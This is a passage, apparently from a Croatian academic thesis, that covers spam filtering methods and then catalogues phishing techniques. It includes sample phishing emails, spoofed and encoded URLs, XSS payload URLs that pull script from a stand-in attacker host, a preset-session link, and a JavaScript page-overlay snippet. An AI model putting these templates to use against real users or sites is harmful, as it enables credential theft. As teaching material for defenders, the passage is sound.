provode se razni testovi. Ti testovi traže karakteristike koje su vjerojatnosti indikatori da je poruka neželjena odnosno spam. Svaka od karakteristika ima svoju vjerojatnost te se na temelju toga daje ukupna ocjena spam vjerojatnosti na temelju rezultata testova. Primjerice kao što je spomenuto kod načina filtriranja poruka temeljenog na pretraživanju po ključnoj riječi mnogi spameri kako bi izbjeli filtriranje ulazu HTML komentare, slike ili reference u tijelo poruke. Filtri heurističkih analiza mogu koristiti detekciju slika kao jedan od svojih testova. U kombinaciji s drugim testovima kao što su poruke koje obuhvaćaju velike fontove, umetnuti tekst ili krivotvorena zaglavlja te će poruke dobiti veću vjerojatnosnu vrijednost da su spam poruke. Popularni heuristički alat filtriranja za poslužitelje e-pošte je open source ‘‘SpamAssassin’‘ na stranici spamassassin.apache.org. Ipak i heuristička analiza može generirati lažne pozitivnosti. Moraju se kreirati novi testovi da obuhvate nove spam tehnike, a stariji se mogu isključiti jer postaju beskorisni. Većina davatelja Internet usluga koriste ovu metodu filtriranja, ali postoji i anti-spam softver za osobna računala koji također koristi ovu metodu.

2.3.5 Potpisi spama

Ova metoda radi na sličnom principu na kojem radi detekcija virusa antivirusnim programima. Računalni program računa kontrolni zbroj poznatih spam poruka i kreira potpis tih poruka. Kontrolni zbroj je matematička operacija koja tekstualnu poruku pretvara u numerički zbroj. Ako kontrolni zbroj primijenimo na dvije identične kopije poruke dobit ćemo isti zbroj dok svaka promjena u tekstu poruke generira različit zbroj. Ova metoda otkrivena je kao odlična metoda za identificiranje spama jer spameri šalju na tisuće istih poruka. Filtar koji se temelji na potpisu čuva kopiju potpisa trenutnih spam poruka i primjenjuje metodu kontrolnog zbroja na svaku ulaznu poruku. Ona ulazna poruka koja odgovara potpisu sigurno je spam i može se odbaciti. Naravno i za ovu metodu spameri su pronašli rješenje kako da je nadmudre. Primjerice mnogi alati spam alati umeću nasumične nizove znakova na kraj retka s naslovom ili u samo tijelo svake poruke koju šalju. Mogu umetati i HTML komentare između riječi i slova. Ti komentari su nevidljivi primatelju poruke, ali će biti obuhvaćeni u funkciji kontrolnog zbroja. Posstavljanjem nasumičnih elemenata u e-poštu osigurava se da će metoda kontrolnog zbroja proizvesti različitu vrijednost za poruke koje su inače identične. Međutim postoje i anti-spam alati koji imaju rješenje i za ovaj problem. Naime oni računaju kontrolni zbroj samo iz najznačajnijih znakova u poruci te su na taj način umetnuti komentari izostavljeni iz računanja kontrolnog zbroja. Najveće ograničenje tehnike filtriranja spama bazirane na potpisu je vrijeme. Problem je ako spam poruka dođe prije nego što njegov potpis bude usvojen u bazu podataka.

2.3.6 Izazov/odgovor

Ovaj sustav zasnovan je na činjenici da je spam automatiziran izoliranjem pošte novih pošiljatelja i od pošiljatelja zahtjeva da dovrši izazov. Ako je čovjek na drugom kraju uspješno će odgovoriti na izazov, a originalna će poruka dospjeti do onog kome je namijenjena. Međutim ako poruka dolazi od spamera, adresa u From: djelu je krivotvorena i izazov neće biti u mogućnosti da se uspješno završi. Čak i ukoliko je adresa valjana spam poruka je programski generirana i program neće znati uspješno izvršiti izazov. Pristigla poruka u tom slučaju bit će odbačena. Izazov je tako osmišljen da ga samo čovjek može riješiti. Jedan od primjera takvog izazova su brojke ili slova koja su izobličena, zatamnjena, prošarana, a koja čovjek i dalje uspješno može prepoznati. Jedan od takvog izazova je prikazan na slici.

Slika 2.2 Izazov/odgovor

Glavni problem ovog načina filtriranja je taj da može generirati dodatni promet e-pošte koji je kontraproduktivan za davatelje usluga i tvrtke koje pokušavaju smanjiti količinu generirane e-pošte. Legitimna pošta također može biti odbačena ukoliko pošiljatelj ne odgovori na poruku s rješenjem unutar određenog vremena.

2.3.7 Bayesiansko filtriranje

Ovaj način filtriranja je oblik klasificiranja teksta koji se može primijeniti na otkrivanje spama. Bayesianski filtar uči razlikovati spam i ham poruke zapažanjem razlika između jezika koji se koristi u spam porukama i jezika u željenoj pošti. Dolaskom nove poruke filtar pregledava riječi ili fraze s najvišom vjerojatnošću za spam ili ne spam. Zatim proračunava novu vjerojatnost da je poruka spam korištenjem pojedinačnih ocjena skupljenih riječi. Ovaj način filtriranja privlači pažnju zbog svog velikog učinka otkrivanja spama. Bill Yerazunis, tvorac filtara pod imenom CRM114 na adresi crm114.sourceforge.net tvrdi da je točnost veća od 99.9 posto na njegovoj vlastitoj ulaznoj pošti. Paul Graham, tvorac Bayesianskog filtra tvrdi da je stopa otkrivanja u jednom mjesecu iznosila 99,75%. On je također izvijestio osam lažnih pozitivnosti u više od 7000 legitimnih poruka u tom razdoblju. Više o tome na adresi www.paulgraham.com/spam.html . Ovi filtri najbolje funkcioniraju ako pojedinačni korisnici sami uče na svojih vlastitim spam i ne spam porukama. Također ovi filtri moraju redovito učiti kako bi se prilagodili promjenama u spamu. Naravno spameri pronalaze rješenja kojima pokušaju nadmudriti ovaj način filtriranja pošte. Tako u spam poruke uključuju velike dijelove nasumičnog teksta poput ulomaka iz enciklopedija kako bi poruka dobila višu ocjenu kao nespam poruka.

2.3.8 Filtriranje reputacije

Postoji nekolicina tvrtki koja prati IP adrese i domene i daje im ocjenu reputacije na temelju količine dobrih poruka e-pošte i količine spam poruka koje šalju. Poslužitelji e-pošte iz bilo kojeg izvora su konfigurirani tako da blokiraju poruke e-pošte iz izvora s lošom reputacijom. Ovaj princip filtriranja je vrlo sličan filtriranju temeljenom na crnim listama osim što su ovi filtri fleksibilniji. Glavni problem kod crnih lista je uklanjanje IP adrese ili domene s nje. Ovdje to nije problem jer se IP adresa ili domena može puno brže ukloniti iz filtra reputacije kako se njihovo ponašanje počne mjenjati. Tvrtka Cloudmark oslanja se na mišljenja korisnika kako bi odvojila neželjenu poštu od željene. Ako pretplatnici Cloudmark-a prime poruku koju smatraju spamom oni će ju proslijediti Cloudmark-u, a onda će tvrtka za tu poruku kreirati potpis. Usluga potom ocjenjuje reputaciju korisnika zbog točnosti u odlučivanju treba li Cloudmark blokirati poruku za cijelu zajednicu. www.cloudmark.com/safetybar

Drugi pokušaj filtriranja reputacije je program ‘‘Bonded Sender’‘. Tvrtke koje šalju gomile komercijalnih poruka e-pošte koje su klijenti tražili često otkrivaju da njihove poruke blokiraju spam filtri. Kako bi pomogle u tome da legitimne komercijalne poruke prođu kroz spam filtre, te organizacije mogu položiti financijske obveznice kroz program ‘‘Bonded Sender’‘. Ako se neki krajnji korisnik bude želio da je e-pošta zapravo bila neželjena, organizacija plaća novčanu kaznu za koju sredstva dolaze od vrijednosti obveznica. Zauzvrat za ovo jamstvo vlasnici spam filtara mogu dopustiti da poruka e-pošte sudionika Bonded Sendera zaobiđe njihove filtre. Ovaj program sponzorira tvrtka IronPort koji proizvodi poslužitelje e-pošte. Pojedinačni se korisnici ne mogu pridružiti ovom programu. www.bondedsender.com [13]

3 Phishing tehnike

3.1 Dostava phishing e-mail poruka

3.1.1 E-mail i spam

Najveći broj phishing napada započinje slanjem e-mail poruke. Korištenjem tehnika korištenih od strane spamera pecači mogu dostaviti posebno oblikovane poruke na milijune e-mail adresa u samo nekoliko sati ili minuta ukoliko koriste distribuiranu trojansku mrežu. U mnogim slučajevima lista adresa na koje se šalje pošta je nabavljena od istog izvora kao i spam poruke.

Iskorištavanjem dobro poznatih mana protokola za slanje e-maila (SMTP) pecačima je omogućeno da lažiraju polja ‘‘Mail From:’‘ zaglavlja i imitiraju organizaciju po želji. Iako porastom medijske pozornosti orijentirane na phishing sve više korisnika je vrlo oprezno pri slanju povjerljivih informacija e-mail poštom, pecači su i dalje uspješni u mnogim slučajevima.

Tehnike korištene u phishing e-mail porukama:

· E-mail službenog izgleda

· Kopije pravovaljanih e-mail poruka sa manjim izmjenama URL-a

· E-mail poruke bazirane na HTML-u korištenom za prikrivanje informacija o cilju URL-a

· E-mail poruke koje sadržavaju u privitku viruse ili crve

· Poruke sa velikim brojem anti spam dodataka

· Izrada osobnih ili jedinstvenih e-mail poruka

· Korištenje lažiranja polja ‘‘Mail From: ’‘

Stvarni primjer phishinga

Sljedeći primjer poslan je tisućama Westpac bankovnih korisnika u svibnju 2004. godine. Iako se vidi loša jezična profinjenost ipak su mnogi od primatelja ipak prevareni.

Subject: Westpac official notice

Westpac

AustraIia's First Bank

Dear cIient of the Westpac Bank,

The recent cases of fraudulent use of clients accounts forced the Technical services of the bank to update the software. We regret to acknowledge, that some data on users accounts could be lost. The administration kindly asks you to follow the reference given below and to sign in to your online banking account:

https://oIb.westpac.com.au/ib/defauIt.asp

We are gratefuI for your cooperation.

Please do not answer this message and follow the above mentioned instructions.

Stvari koje treba uočiti u ovom napadu su sljedeće:

· E-mail poruka je poslana u HTML formatu (neki napadi koriste HTML koji je formatiran tako da izgleda kao čisti tekst što otežava primatelju identifikaciju skrivenih svojstava dinamičkog sadržaja e-mail poruke)

· Malo slovo ‘‘L’‘je zamijenjeno sa velikim slovom ‘‘i’‘. To se koristi za zaobilaženje anti-spam filtra i u većini fontova izgledaju identično.

· Poruka sadrži velik broj skrivenih riječi unutar HTML-a. Boja tih riječi je postavljena na boju podloge tako da nisu direktno vidljive čitatelju. Namjena tih riječi je zaobilaženje anti-spam filtara.

· URL link https://oIb.westpac.com.au/ib/defauIt.asp u stvari se referencira na escape kodiranu verziju sljedećeg URL-a: http://olb.westpac.com.au.userdll.com:4903/ib/index.htm. To je postignuto korištenjem standardnog HTML kodiranja poput:

<a href= http://olb.westpac.com.au.userdll.com:4903/ib/index.htm> https://oIb.westpac.com.au/ib/defauIt.asp</a>

· Pecači su koristili domenu USERDLL.COM kako bi zavarali primatelja da se radi o stvarnoj web stranici Westpac banke.

· Nestandardni HTTP port 4903 može se povezati s time da se stranica nalazi na nekom od računala treće strane koje je prethodno kompromitirano od strane napadača.

· Primatelji koji slijede link su zatim usmjereni prema stvarnoj Westpacovoj aplikaciji. Međutim JavaScript popup prozor sadržava lažnu login stranicu koja se prezentira korisniku. Stručna analiza tog JavaScript koda pokazuje da su dijelovi korišteni u prijašnjim phishing napadima.

· Lažni login prozor je dizajniran kako bi spremio primateljeve autentifikacijske podatke. Zanimljivost ovog napada je u tome što JavaScript kod dostavlja autentifikacijske podatke pravoj Westpacovoj aplikaciji i preusmjerava korisnika na nju. Korisnik nije ni svjestan da je njegova inicijalna konekcija presretnuta i da su njegovi podaci ukradeni.

3.1.2 Dostava preko Weba

Popularna metoda u stalnom porastu je obavljanje phishing napada preko zlonamjernog sadržaja web stranica. Sadržaj može biti uključen na web stranicu upravljanu od strane pecača ili na stranicu koja nije upravljana od njegove strane.

Tehnike korištene za dostavu preko Weba:

· Uključenje prikrivenih HTML linkova unutar popularnih web stranica.

· Korištenje grafičkih oglasa nabavljenih od treće strane kako bi namamili korisnike na svoje web stranice.

· Korištenje web bugova (skrivenih elemenata u stranici, npr. slika veličine nula pixela) pomoću kojih prate potencijalnog korisnika za phishing napad.

· Korištenje popup ili prozora bez okvira za prikrivanje pravog izvora poruke.

· Uključivanje zlonamjernog sadržaja unutar web stranica koji iskorištavanja poznate ranjivosti unutar korisničkog web preglednika za instaliranje zlonamjernog softvera.

· Zlouporaba postavki unutar korisničkog web preglednika i iskorištavanje područja za pohranu podataka.

Korištenje lažnog oglašavanja

Ovo je vrlo jednostavna metoda koju pecači koriste kako bi preusmjerili korisnike neke organizacije na lažne web stranice. Koriste se kopirani grafički oglasi i postavljaju na popularne web stranice. Za prikrivanje stvarne adrese odredišta na koju vode koristi se tehnika spomenuta ranije odnosno jednostavno prikrivanje URL-a.

Slika 3.1 Primjer korištenja lažnog oglašavanja

3.1.3 IRC i Instant Messenging

Povećanjem korištenja ovih komunikacijskih kanala kod kućnih korisnika i uključivanjem sve više funkcionalnosti unutar softvera raste i broj phishing napada. Sve dok IRC i IM klijenti dopuštaju uključivanje dinamičkog sadržaja (npr. slika, URL-ova, multimedije i sl.) koji se mogu poslati, pecači mogu vrlo jednostavno iskoristiti sve spomenute tehnike korištene kod standardnih napada baziranih na dostavi preko weba.

3.1.4 Računala zaražena trojanskim konjem [10]

Računala zaražena trojanskim konjem koriste se za masovno slanje e-mail poruka. Ona omogućuju pecačima da upravljaju tim računalima i koriste ih za kriminalne radnje skrivajući pritom svoj trag. Važno je napomenuti da je broj računala zaraženih trojanskim konjem u stalnom porastu unatoč naporima velikih anti-virusnih kompanija. Razvijene su vrlo uspješne tehnike kako bi prevalile korisnike da instaliraju taj softver. Danas postoji velik broj zaraženih računala (mreže od tisuće zaraženih računala nisu rijetkost) koja se mogu koristiti za masovno slanje e-mail poruka ili kao poslužitelji web stranica. Zbog velike količine informacija koje se sakupljaju (nekoliko tisuća korisnika) pecači odabiru samo neke od njih koje će sačuvati. Stoga postoje trojanski konji za sakupljanje specifičnih informacija.

Početkom 2004. godine pecači su kreirali ‘‘keystroke logger’‘ trojana. Unutar standardne HTML poruke bio je umetnut kôd koji je pokušao pokrenuti Java applet pod nazivom ‘‘javautil.zip’‘. Iako izgleda kao da se radi o binarnoj zip datoteci, naime radi se o izvršnoj datoteci koja se automatski poziva i izvršava unutar klijentskog preglednika sa slabim sigurnosnim ovlastima. Program je bio posebno dizajniran tako da pamti sve pritisnute tipke unutar prozora s nekim od sljedećih naslova: NetBank, Citibank, Bank of America, e-gold, EVOcash, INTGold, PayPal, Bank West, National Internet Banking...

3.2 Phishing napadi

Kako bi phishing napadi bili uspješni pecači moraju koristiti različite metode kako bi zavarali korisnike da posjete njihove poslužitelje. Najčešće metode opisane su u nastavku i dijele se na:

· Napadi sa čovjekom u sredini (engl. Man-in-the-middle Attacks)

· Napadi lažiranjem URL-a (engl. URL Obfuscation Attacks)

· Cross-site Scripting napadi (engl. Cross-site Scripting Attacks)

· Napadi unaprijed postavljenom sjednicom (engl. Preset Session Attacks)

· Skriveni napadi (engl. Hidden Attacks)

· Motrenje korisničkih podataka (engl. Observing Customer Data)

· Iskorištavanje ranjivosti klijentske strane (engl. Client-side Vulnerability Exploitation)

3.2.1 Napadi s čovjekom u sredini [11]

Ovo je jedan od najuspješnijih napada za dobivanje korisničkih informacija. U ovom tipu napada napadač se smješta između korisnika i stvarne web aplikacije. Prednost ovog napada je taj što napadač promatra i sprema sve transakcije. Ovaj tip napada uspješan je kod HTTP i HTTPS tipa komunikacijskog protokola. Korisnik se spaja na napadački poslužitelj misleći da se spaja na željeni poslužitelj, a napadački poslužitelj se istodobno spaja na originalni poslužitelj. Napadački poslužitelj posreduje u komunikaciji glumeći stvarni poslužitelj. U slučaju sigurnog HTTPS protokola, SSL konekcija je ostvarena između korisnika i napadačkog poslužitelja, a napadački poslužitelj stvara vlastitu SSL konekciju između sebe i stvarnog poslužitelja.

Slika 3.2 Napad s čovjekom u sredini

Kako bi ovaj tip napada bio uspješan napadač mora biti u mogućnosti usmjeriti korisnika na svoj umjesto na pravi poslužitelj. To se može postići korištenjem jedne od sljedećih metoda:

· (engl. Transparent Proxies)

· (engl. DNS Cache Poisoning )

· (engl. URL Obfuscation)

· (engl. Browser Proxy Configuration)

Transparent Proxies

Smješten na istom mrežnom segmentu ili na putu prema stvarnom poslužitelju transparentni Proxies može presresti sve podatke preusmjeravajući sav HTTP i HTTPS promet preko sebe. U ovom slučaju nikakve akcije nije potrebno poduzeti na strani korisnika.

DNS Cache Poisoning

Ova metoda može biti korištena za prekidanje normalnog preusmjeravanja prometa ubacivanjem lažnih IP adresa za ključna imena domena. Primjerice napadač može promijeniti DNS zapis mrežne zaštitne stijene tako da sav zapis adresiran na MyBank IP adresu bude preusmjeren prema IP adresi napadačevog poslužitelja.

URL Obfuscation

Kod ove metode napadač pokušava prevariti korisnika da se spoji na njegov umjesto na stvarni poslužitelj. Primjerice korisnik klikom slijedi link http://www.mybank.com.ch/ umjesto http://www.mybank.com/.

Browser Proxy Configuration

Prepisivanjem postavka korisničkog web poslužitelja i konfiguriranjem Proxya napadač može natjerati sav web promet prema svom poslužitelju.

3.2.2 Napadi lažiranjem URL-a [3]

Tajna mnogih napada leži u tome da se natjera primatelje e-mail poruke da slijede hipervezu prema napadačevom poslužitelju bez znanja da su prevareni. Nažalost napadači na izbor imaju velik broj različitih metoda lažiranja konačnog odredišta korisničkog web zahtjeva. Najčešće metode uključuju:

· Loša imena domena

· Dobrohotne login URL-ove

· Skraćene URL-ove treće strane

· Lažiranje imena računala domaćina

· Lažiranje URL-a

Loša imena domena

Ovo je jedna od najtrivijalnijih metoda. Uzmimo primjer institucije MyBank sa registriranom domenom mybank.com i pripadajuću transakcijsku web stranicu http://privatebanking.mybank.com. Napadač može postaviti poslužitelj sa jednom od sljedećih domena kako bi mogao lažirati odredište računala domaćina:

· http://privatebanking.mybank.com.ch

· http://mybank.privatebanking.com

· http://privatebanking.mybonk.com ili čak http://privatebanking.mybánk.com

· http://privatebanking.mybank.hackproof.com

Važno je uočiti da internacionalizacijom domena postoji mogućnost registracije imena domene nekog drugog jezika i korištenje njegovih pripadajućih znakova. Tako primjerice ‘‘o’‘ u ćirilici izgleda identično ASCII znaku ‘‘o’‘, ali se koriste u različitim domenama. Poznat je slučaj od prije nekoliko godina u Rusiji kada se jedna njihova kompanija registrirala s domenom microsoft.com. Međutim postoje i nejasnoće unutar istog seta znakova. Takav primjer je nejasnoća između znakova veliko ‘‘i’‘ i malo ‘‘L’‘ unutar ASCII seta znakova.

Dobrohotni login URL-ovi

Mnogi web preglednici dozvoljavaju korištenje složenih URL-ova koji uključuju autentifikacijske podatke kao što su korisničko ime i lozinka. Općenito format takvog URL-a izgleda: URI://username:password@hostname/path.

Pecači mogu promijeniti korisničko ime i lozinku u podatke ciljanje organizacije. Primjer pokazuje jednostavno postavljanje korisničkog imena na mybank.com, lozinke na ebanking i odredišnog računala na evilsite.com. Izgled izmijenjenog URL-a izgleda sljedeće:

http://mybank.com:ebanking@evilsite.com/phishing/fakepage.htm

Izmijenjeni URL može vrlo jednostavno prevariti velik broj korisnika misleći da posjećuju pravovaljanu MyBank web stranicu. Zbog svoje uspješnosti napada, većina današnjih web preglednika izbacila je ovakvu mogućnost kodiranja URL-a.

Skraćeni URL-ovi treće strane

Radi duljine i kompleksnosti mnogih URL-ova kombinirane s različitim načinima na koji ih pojedini e-mail sustavi prikazuju (npr. sa dodatnim prazninama i oznakama novog retka unutar URL-a), organizacije treće strane ponudile su usluge koje omogućuju skraćenje URL-ova. Kombinaciju društvenog inženjeringa i namjerno dugačkih i neispravnih URL-ova, pecači mogu iskoristiti u svrhu maskiranja pravog odredišta. Evo primjera:

Dear valued MyBank customer,

Our automated security systems have indicated that access to your online account was temporarily blocked on Friday 13 September between the hours of 22:32 and 23:46 due to repeated login failures. Our logs indicate that your account received 2935 authentication failures during this time. It is most probable that your account was subject to malicious attack through automated brute forcing techniques (for more information visit http://support.mybank.com/definitions/attacks.aspx?type=bruteforce).

While MyBank were able to successfully block this attack, we would recommend that you ensure that your password is sufficiently complex to prevent future attacks. To log in and change your password, please click on the following URL: https://privatebanking.mybank.com/privatebanking/ebankver2/secure/customer support.aspx?messageID=3324341&Sess=asp04&passwordvalidate=true&changepassword=true

If this URL does not work, please use the following alternative link which will redirect to the full page - http://tinyurl.com/4outd

Best regards, MyBank Customer Support

Skraćeni URL-ovi treće strane

Većina Internet korisnika je naučena koristiti potpuno kvalificirana imena domena (engl. Fully qualified domain name) kao primjerice www.evilsite.com. Kako bi se takva adresa koristila na Internetu ona mora biti pretvorena u IP adresu kao primjerice 209.134.161.35 za spomenutu web adresu. Pretvorbu obavljaju poslužitelji za razrješavanje adresa (engl. Domain Name Server - DNS). Pecači mogu koristiti IP adrese kao dio URL-a kako bi sakrili korisniku adresu odredišta. Npr. sljedeći URL:

http://mybank.com:ebanking@evilsite.com/phishing/fakepage.htm

može se učiniti nejasnim pretvaranjem u:

http://mybank.com:ebanking@210.134.161.35/login.htm

Iako je dio korisnika upoznat s klasičnom reprezentacijom IP adresa, većina ih nije upoznata s ostalim mogućim reprezentacijama. Na taj način može se učiniti nevidljivom adresa računala na koji se URL odnosi. Ovisno o aplikacijama koje interpretiraju IP adresu postoji nekoliko alternativnih načina prikazivanja IP adrese:

· Dword – sastoji se od dvoje binarne riječi duljine 16 bita prikazane u dekadskom brojevnom sustavu

· Octal – adresa prikazana u oktalnoj bazi

· Hexadecimal – adresa prikazana u heksadekadskom brojevnom sustavu

Sljedeći primjer prikazuje korištenje spomenutih alternativnih načina. Tako URL http://www.evilsite.com/ razriješen u IP adresu 210.134.161.35 može biti prikazan na sljedeće načine:

· Decimal – http://210.134.161.35/ (klasična prezentacija)

· Dword – http:// 3532038435/

· Octal – http://0322.0206.0241.0043/

· Hexadecimal – http://0xD2.0x86.0xA1.0x23/ ili čak http://0xD286A123/

· U nekim slučajevima dozvoljeno je i miješanje prethodnih (npr. http://0322.0x86.161.0043/)

Lažiranje URL-a

Kako bi omogućili višejezičnu podršku web preglednici i e-mail klijenti podržavaju alternativni način kodiranja podataka. Korištenje takvog kodiranja omogućava pecačima vrlo jednostavno lažiranje URL-ova. Ove sheme kodiranja prihvaćene su u većini web preglednika i mogu biti različito interpretirane od web poslužitelja i njegove aplikacije. Ovo su neke tipične sheme:

· Escape Encoding – Ovo je prihvaćena metoda reprezentacije znakova unutar URL-a koji trebaju posebnu sintaksnu interpretaciju za ispravno prezentiranje. Interpretacija takvog znaka postiže se kodiranjem znaka sa slijedom od tri znakova. Trojka se sastoji od znaka posto ''%“ iza kojeg slijede dva heksadekadska znaka koja predstavljaju kod originalnog znaka. Primjerice US-ASCII znak koji predstavlja prazno mjesto s heksadekadskim kodom 20, zapisan je kao %20.

· Unicode Encoding – Kod ove metode znak je prezentiran s nekoliko bajtova koji označavaju jedinstveni referentni broj za svaki znak neovisno o jeziku i platformi. Ovaj način kodiranja dizajniran je kako bi omogućio univerzionalni set znakova (engl. Universal character set - UCS). Tako primjerice Unicode (UCS-2 ISO 10646) ostvaren s dva bajta označava 2¹⁶mogućih znakova. Tako kodirani znak praznog mjesta na Microsoft Windows platformi izgleda %u0020.

· Neodgovarajući UTF-8 Encoding – Jedan od najčešće korištenih formata Unicode UTF-8 imam mogućnost očuvanja potpunog US-ASCII znakovnog raspona. Ova mogućnost pruža mnogo načina za prikrivanje standardnog znaka duljim kodiranim slijedom znakova. Primjerice znak točka može biti prikazan kao %2E ili %C0%AE ili %E0%80%AE ili %F0%80%80%AE ili %F8%80%80%80%AE ili čak kao %FX%80%80%80%80%AE.

· Višestruki Encoding – Različite smjernice i RFC-ovi detaljno objašnjavaju metode dekodiranja znakova kodiranih escape sekvencama i aludiraju na opasnosti kod dekodiranja više puta i kod više nivoa aplikacije. Ipak mnogo aplikacija i dalje neispravno parsiraju podatke više puta. Posljedica je da pecači mogu lažirati URL kodiranjem znaka više puta. Npr. znak ‘‘\’‘ kodiran originalno kao %25 može biti proširen na %255C ili na %35C ili %%35%63 ili %25%35%63 itd.

3.2.3 Cross-site Scripting napadi [4]

Ovi napadi se obično odnose na CSS ili XSS iskorištavajući URL ili ubacivanje koda u ispravne web orijentirane aplikacije. Postoji velik broj načina provedbe CSS napada. Tipični oblici napada umetanjem CSS-a unutar ispravnog URL-a uključuju:

· Potpunu HTML zamjenu: http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm

· Inline uključivanje skriptnog sadržaja Inline: http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode...

· Tjeranjem učitavanja vanjskog skriptnog koda: http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2

Slika 3.3 Cross-site Scripting napadi

U primjeru na slici 3.3 korisnik je od pecača primio e-mailom sljedeći link:

http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm

Iako je korisnih doista usmjeren na pravu MyBank stranicu, zbog lošeg dizajna dozvoljeno je umetanje URL polja. Umjesto da aplikacija pruži MyBank-ovu autentifikacijsku formu uključenu unutar stranice, napadač je postavio formu sa svog poslužitelja (http://evilsite.com/phishing/fakepage.htm).

Kao kod većine CSS ranjivosti korisniku nije pružena mogućnost prepoznavanja da stranica na kojoj se nalazi nije valjana. Iako je iz URL-a u ovom primjeru očit pokušaj napada, korištenjem spomenutih načina lažiranja URL-a to se može učiniti teško uočljivim. Npr. umjesto http://evilsite.com/phishing/fakepage.htm može se napisati: http%3A%2F%2F3515261219%2Fphishing%C0%AEfakepage%2Ehtm

3.2.4 Napadi unaprijed postavljenom sjednicom [5]

Pošto su HTTP i HTTPS protokoli bez stanja, aplikacije orijentirane na web moraju koristiti neke od metoda praćenja korisnika kroz svoje stranice i upravljati pristupom resursima koji zahtijevaju autentifikaciju. Najuobičajeni način upravljanja stanjem unutar aplikacije je korištenjem identifikatora sjednice (SessionID). Identifikator može biti implementiran kroz kolačiće (engl. cookies), skrivena polja ili poljima unutar URL-a. Mnoge web aplikacije implementiraju loše sustave za upravljanje stanjem i dopuštaju klijentu da definira identifikator sjednice. Aplikacija će pratit korisnika korištenjem unaprijed definiranog identifikatora sjednice, ali će obično tražiti autentifikaciju za pristup do posebnog sadržaja.

Kod ove vrste napada poruka poslana od pecača sadrži web link prema valjanom poslužitelju, ali sadrži i unaprijed definirani identifikator sjednice. Napadački sustav konstantno traži od poslužitelja pristup posebnom sadržaju koristeći taj SessionID. Sve dok se korisnik ne autentificira za pristup tom sadržaju napadač dobiva pogreške od poslužitelja. Nakon autentifikacije korisnika poslužitelj dozvoljava bilo kojoj konekciji koja koristi taj isti SessionID pristup do tog sadržaja.

Slika 3.4 Napad unaprijed postavljenom sjednicom

Pecač konstantnim slanjem zahtjeva za web stranicom unutar koje se nalazi postavljen SessionID (3V1L5e5510N) poslužitelju na adresi https://mybank.com/ebanking?session=3V1L5e5510N&Login=True dobiva pogrešku (npr. 404 File Not Found). Nakon što se korisnik autentificira klikom na taj isti link i korištenjem istog sjedničkog identifikatora i napadač dobiva pristup tom istom sadržaju.

3.2.5 Skriveni napadi

Osim spomenutih napada napadači mogu koristiti HTML, DHTML i druge skriptne kodove koje razumije korisnički web preglednik za manipulaciju prikaza informacija. U mnogim slučajevima napadači koriste ove tehnike za maskiranje lažiranog sadržaja kao da dolazi s prave stranice. Najčešći oblici napada uključuju:

· Skrivene okvire

· Prepisivanje sadržaja web stranice

· Zamjena grafičkih elemenata

Skriveni okviri

Okviri su popularna metoda skrivenih napada zbog svoje jednostavnosti i mogućnošću korištenja na različitim preglednicima. Sljedeći primjer definira dva okvira. Prvi okvir sadrži valjani URL dok se drugi koji zauzima 0% sučelja preglednika odnosi na pecačev sadržaj. Stranica na koju se odnosi link unutar skrivenog okvira može biti korištena za pribavljanje dodatnog sadržaja (npr. prepisivanje sadržaja stranice ili zamjena grafičkih elemenata), pribavljanje povjerljivih informacija kao što su SessionID ili za izvršavanje key-logging ili screen grabbing koda.

</frameset>

Skriveni okviri mogu biti korišteni za:

· Skrivanje izvorne adrese napadačkog poslužitelja. Samo URL glavnog okvira vidljiv je unutar sučelja preglednika.

· Pružanje lažnog sigurnog HTTPS omotača, tjerajući web preglednik da pokazuje znak lokota ili slični znak sigurnosti iako se i dalje koristi nesiguran HTTP za sadržaj i operacije skrivenog okvira.

· Skrivanje HTML koda od korisnika. Korisnik nije u mogućnosti vidjeti skriveni sadržaj stranice kroz standardnu ''View Source“ opciju.

· ''Page Properties“ prikazuje kod većine preglednika samo najgornji vidljivi izvor stranice.

· Učitavanje slika i HTML sadržaja potrebnog za kasnije korištenje od strane zlonamjernih programa.

· Pohranjivanje koda koji izvještava napadača da se korisnik nalazi na željenoj stanici.

· Kombiniranjem sa skriptnim jezicima daje mogućnost promjene funkcionalnosti alatne trake web preglednika tako da ona pokazuje drugačiji URL.

Prepisivanje sadržaja web stranice

Postoji nekoliko metoda kojima pecači mogu pregaziti sadržaj web stranice. Jedna od najpopularnijih metoda ubacivanja lažnog sadržaja unutar stranice je korištenje DHTML funkcije DIV. DIV funkcija omogućava napadaču ubacivanje sadržaja u virtualni spremnih koji putem metode STYLE može biti pozicioniran iznad sadržaja, prekrivajući tako sadržaj stranice koji se nalazi ispod. Taj zlonamjerni sadržaj može biti dostavljen kao vrlo dugački URL ili referenciranjem pohranjene skripte. Sljedeći primjer sadrži mali JavaScript file (‘‘fake.js’‘) za prepisivanje sadržaja stranice.

var d = document;

d.write('<DIV id=„fake“ style=„position:absolute; left:200; top:200; z-index:2“>

<TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>');

d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');

Ova metoda omogućava pecačima izgradnju kompletnih stranica iznad prave stranice prekrivajući kompletan njen sadržaj.

Zamjena grafičkih elemenata

Iako postoji mogućnost prepisivanja kompletnog sadržaja stranice, pecači nailaze na problem što web preglednici postavljaju posebne vizualne znakove kao što su URL prikazan unutar URL polja preglednika, lokot koji označava HTTPS kriptiranu konekciju i zone izvora stranice.

Zajednička metoda koja rješava navedene probleme je korištenje skriptnih jezika kao što su JavaScript, VBScript i Java kako bi se postavio željene grafičke elemente preko tih područja. U primjeru koji slijedi napadač postavlja pažljivo pozicioniranu lažnu adresnu traku i sliku koja označava lokot i zonu kako bi sakrio stvarne oznake. Napomenimo da ne pokazuju svi preglednici na jednak način ove grafičke elemente. Stoga napadač prvo mora otkrit koji preglednik korisnik koristi, što je trivijalno i zatim pripremiti odgovarajuće sličice za svaku skupinu korisnika.

3.5 Stranica predstavljena s lažnom adresnom trakom, sigurnim lokotom i izmijenjenom zonom

Napomenimo da postoje nekoliko primjera napada u kojima napadači kombiniraju zamjenu grafičkih elemenata sa dodatnim skriptnim kodom kako bi lažirali i neke druge funkcionalnosti web preglednika. Primjeri uključuju:

· Implementaciju funkcionalnosti desnog klika mišem i menija

· Prikazivanje lažnih popup poruka koje prikazuju i stvarne aplikacije

· Prikazivanje lažnog SSL certifikata kod pregleda svojstava stranice

